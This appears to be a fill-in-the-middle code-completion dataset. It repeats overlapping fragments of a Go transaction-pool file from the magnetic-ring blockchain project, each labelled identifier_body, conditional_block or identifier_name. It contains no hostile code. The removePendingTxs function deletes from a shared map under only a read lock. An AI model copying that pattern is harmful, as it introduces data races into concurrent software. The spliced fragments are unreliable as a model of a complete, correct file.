pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
} | identifier_body |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch |
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| {
pool.TxEnqueue(ch)
} | conditional_block |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) | () {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
oldSV := pool.stateValidator
pool.stateValidator = validation.NewStateValidate(ledgerStore)
if oldSV != nil {
txch := oldSV.TxInheritance()
for ch := range txch {
pool.TxEnqueue(ch)
}
}
pool.refreshWaitPool()
//log.Info("func txpool RefreshValidator 02", "newTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 02 ", "newTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
func (pool *TxPool) AddTx(tx *types.Transaction) error {
result, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
return err
}
txHash := tx.Hash()
switch result {
case -1:
return err
case 0: //
if uint32(len(pool.txChan)) < pool.maxInQueue {
pool.waitTxNum[txHash]++
if uint32(pool.waitTxNum[txHash]) == config.GlobalConfig.TxPoolCfg.MaxTxInPool { // 下一个块在考虑 尝试四次都失败后执行
pool.waitPool = append(pool.waitPool, tx)
} else if uint32(pool.waitTxNum[txHash]) < config.GlobalConfig.TxPoolCfg.MaxTxInPool {
pool.txChan <- tx
}
} else {
return errors.ERR_TXPOOL_OUTOFMAX
}
return nil
case 1: //
fmt.Printf("validate tx success,txhash=%s\n", txHash.String())
p2ppid, err := bactor.GetActorPid(bactor.P2PACTOR)
if err != nil {
log.Error("tx_pool.go get p2ppid error", "error", err)
} else {
p2ppid.Tell(tx)
}
pool.pdmgr.addTx(tx, pool.maxPending)
return nil
}
return nil
}
func (pool *TxPool) GetTxpoolPID() *actor.PID {
return pool.txpoolPid
}
func (pool *TxPool) TxEnqueue(tx *types.Transaction) error {
log.Info("magnetic try to enqueue", "tx", tx, "queue.size", len(pool.txChan))
//if uint32(pool.queue.Size()) >= pool.maxInQueue {
// return errors.ERR_TXPOOL_OUTOFMAX
//}
if uint32(len(pool.txChan)) >= pool.maxInQueue {
return errors.ERR_TXPOOL_OUTOFMAX
}
log.Info("magnetic enqueue success", "tx", tx, "queue.size", len(pool.txChan))
//pool.queue.Enqueue(tx)
pool.txChan <- tx
return nil
}
/**
generate block
*/
func (pool *TxPool) GenerateBlock(height uint64, packtx bool) *types.Block {
//pool.ticker.Stop()
sts := states.AccountStates{}
var txs *types.Transactions
if packtx {
txs = pool.pdmgr.getTxs(pool.maxPending)
if txs != nil && txs.Len() > 0 {
sort.Sort(txs)
}
}
var txsroot common.Hash
var txns types.Transactions
if txs != nil {
txsroot = txs.GetHashRoot()
txns = *txs
}
block := &types.Block{
Header: &types.Header{
Height: height + 1,
Version: types.TxVersion,
PrevBlockHash: storages.GetLedgerStore().GetCurrentBlockHash(),
LeagueRoot: common.Hash{},
ReceiptsRoot: common.Hash{},
TxRoot: txsroot,
StateRoot: sts.GetHashRoot(),
Timestamp: uint64(time.Now().Unix()),
},
Transactions: txns,
}
return block
}
func (pool *TxPool) ValidateSyncTxs(txhashes []*common.Hash) error {
if pool.pdmgr.pendingTxs == nil || len(pool.pdmgr.pendingTxs) < 1 {
return errors.ERR_TXPOOL_TXNOTFOUND
}
//for _, v := range txhashes {
//vtx := pool.queue.Remove(*v)
//if vtx == nil {
// return errors.ERR_TXPOOL_TXNOTFOUND
//}
//result, err := pool.stateValidator.VerifyTx(vtx)
//
//switch result {
//case -1:
// return err
//case 0:
// if uint32(pool.queue.Size()) < pool.maxInQueue {
// pool.queue.Enqueue(vtx)
// } else {
// return errors.ERR_TXPOOL_OUTOFMAX
// }
// return nil
//case 1:
// pool.pdmgr.addTx(vtx, pool.maxPending)
// return nil
//}
//}
return nil
}
func (pool *TxPool) Execute() *storages.BlockInfo {
log.Info("func txpool Execute", "targetHeight", pool.stateValidator.TargetHeight)
/*for _, tx := range pool.mustPackTxs {
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
}*/
objectiveTxs, err := pool.mainRadar.GenerateMainTxs()
if err != nil {
log.Error("GenerateMainTxs failed", "error", err)
}
for _, tx := range objectiveTxs {
if validation.AutoNonceContains(tx.TxType) {
nonce := validation.AccountNonceInstance.GetAccountNonce(tx.TxData.From)
tx.TxData.Nonce = nonce + 1
validation.AccountNonceInstance.SetNonce(tx.TxData.From, nonce+1)
fmt.Println("🚰 Execute txhash", tx.TxData.LeagueId.ToString())
}
ret, err := pool.stateValidator.VerifyTx(tx)
if err != nil {
log.Error("range pool.mustPackTxs verifyTx error", "ret", ret, "error", err)
}
if ret != 1 {
fmt.Println("🚰 🚰 🚰 objTx verify failed!!! result:", ret, tx.TxType)
}
if tx.TxType == types.ConsensusLeague {
fmt.Printf("🚰 🚰 🚰 ♋️ leagueId:%s startheight:%d endheight:%d energy:%s blockroot:%s\n",
tx.TxData.LeagueId.ToString(),
tx.TxData.StartHeight,
tx.TxData.EndHeight,
tx.TxData.Energy.String(),
tx.TxData.BlockRoot.String())
}
}
return pool.stateValidator.ExecuteOplogs()
}
func (pool *TxPool) RemovePendingTxs(hashes []common.Hash) {
pool.pdmgr.removePendingTxs(hashes)
}
func NewPendingMgr() *PendingMgr {
mgr := new(PendingMgr)
mgr.pendingTxs = make(map[common.Hash]*types.Transaction)
return mgr
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) getTxs(maxInblock uint32) *types.Transactions {
pm.Lock()
defer pm.Unlock()
if len(pm.pendingTxs) < 1 {
return nil
}
txs := make(types.Transactions, 0)
for _, v := range pm.pendingTxs {
txs = append(txs, v)
}
sort.Sort(txs)
le := uint32(len(txs))
if le > maxInblock {
le = maxInblock
}
ret := txs[0:le]
return &ret
}
/*
get txs from pending transaction list
*/
func (pm *PendingMgr) removePendingTxs(txhashes []common.Hash) {
pm.RLock()
defer pm.RUnlock()
if pm.pendingTxs == nil || len(pm.pendingTxs) < 1 {
return
}
for _, v := range txhashes {
delete(pm.pendingTxs, v)
}
}
/*
add tx to pending transaction list
*/
func (pm *PendingMgr) addTx(tx *types.Transaction, maxPending uint32) error {
pm.Lock()
defer pm.Unlock()
if uint32(len(pm.pendingTxs)) > maxPending {
return errors.ERR_TXPOOL_OUTOFMAX
}
pm.pendingTxs[tx.Hash()] = tx
return nil
}
| refreshWaitPool | identifier_name |
tx_pool.go | package mainchain
import (
"fmt"
"sort"
"sync"
"time"
"github.com/sixexorg/magnetic-ring/bactor"
"github.com/sixexorg/magnetic-ring/config"
"github.com/sixexorg/magnetic-ring/log"
"github.com/ontio/ontology-eventbus/actor"
"github.com/sixexorg/magnetic-ring/common"
"github.com/sixexorg/magnetic-ring/core/mainchain/types"
"github.com/sixexorg/magnetic-ring/errors"
"github.com/sixexorg/magnetic-ring/radar/mainchain"
"github.com/sixexorg/magnetic-ring/store/mainchain/states"
"github.com/sixexorg/magnetic-ring/store/mainchain/storages"
"github.com/sixexorg/magnetic-ring/store/mainchain/validation"
)
var (
mainTxPool *TxPool
)
type TxPool struct {
pdmgr *PendingMgr
//queue *TxQueue
waitTxNum map[common.Hash]uint8
waitPool types.Transactions
txChan chan *types.Transaction
maxPending uint32
maxInPending uint32
maxInQueue uint32
stateValidator *validation.StateValidate
ticker *time.Ticker
txpoolPid *actor.PID
mustPackTxs []*types.Transaction
mainRadar *mainchain.LeagueConsumers
}
func NewTxPool() *TxPool {
pool := new(TxPool)
pool.pdmgr = NewPendingMgr()
//pool.queue = NewTxQueue()
pool.maxPending = config.GlobalConfig.TxPoolCfg.MaxPending
pool.maxInPending = config.GlobalConfig.TxPoolCfg.MaxInPending
pool.maxInQueue = config.GlobalConfig.TxPoolCfg.MaxInQueue
pool.txChan = make(chan *types.Transaction, pool.maxInQueue)
pool.RefreshValidator()
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
pool.mustPackTxs = make([]*types.Transaction, 0)
return pool
}
func (pool *TxPool) SetMainRadar(mainRadar *mainchain.LeagueConsumers) {
pool.mainRadar = mainRadar
}
func (pool *TxPool) AppendMustPackTx(txs ...*types.Transaction) {
for _, tx := range txs {
pool.mustPackTxs = append(pool.mustPackTxs, tx)
}
}
type PendingMgr struct {
sync.RWMutex
pendingTxs map[common.Hash]*types.Transaction
}
func InitPool() (*TxPool, error) {
var err error
mainTxPool, err = InitTxPool()
if err != nil {
return nil, err
}
mainTxPool.Start()
return mainTxPool, nil
}
func GetPool() (*TxPool, error) {
if mainTxPool == nil {
return nil, errors.ERR_TXPOOL_UNINIT
}
return mainTxPool, nil
}
func (pool *TxPool) Start() {
pool.RefreshValidator()
go func() {
for {
select {
case tx := <-pool.txChan:
//if !pool.queue.IsEmpty() {
//tx = pool.queue.Dequeue()
err := pool.AddTx(tx)
if err != nil {
fmt.Printf("addtx and validate error=%v\n", err)
log.Info("addtx error", "error", err, "targetBlockHeight", pool.stateValidator.TargetHeight, "errors.ERR_TXPOOL_OUTOFMAX", pool.maxInQueue, "len(pool.txChan)", len(pool.txChan))
}
//}
}
}
}()
}
func startActor(obj interface{}, id string) (*actor.PID, error) {
props := actor.FromProducer(func() actor.Actor {
return obj.(actor.Actor)
})
pid, _ := actor.SpawnNamed(props, id)
if pid == nil {
return nil, fmt.Errorf("fail to start actor at props:%v id:%s", props, id)
}
return pid, nil
}
func InitTxPool() (*TxPool, error) {
pool := NewTxPool()
poolActor := NewTxActor(pool)
pid, err := startActor(poolActor, "txpoolAcotor")
if err != nil {
return nil, err
}
bactor.RegistActorPid(bactor.TXPOOLACTOR, pid)
pool.txpoolPid = pid
return pool, nil
}
func (pool *TxPool) refreshWaitPool() {
if pool.waitPool.Len() > 0 {
for k, _ := range pool.waitPool {
pool.TxEnqueue(pool.waitPool[k])
}
}
pool.waitPool = make(types.Transactions, 0, 10000)
pool.waitTxNum = make(map[common.Hash]uint8, 10000)
}
func (pool *TxPool) RefreshValidator() {
if pool != nil && pool.stateValidator != nil {
//log.Info("func txpool RefreshValidator 01", "oldTargetHeight", pool.stateValidator.TargetHeight, "txlen", pool.stateValidator.GetTxLen())
fmt.Println("func txpool RefreshValidator 01 ", "oldTargetHeight=", pool.stateValidator.TargetHeight, " txlen=", pool.stateValidator.GetTxLen())
}
ledgerStore := storages.GetLedgerStore()
if ledgerStore == nil {
return
}
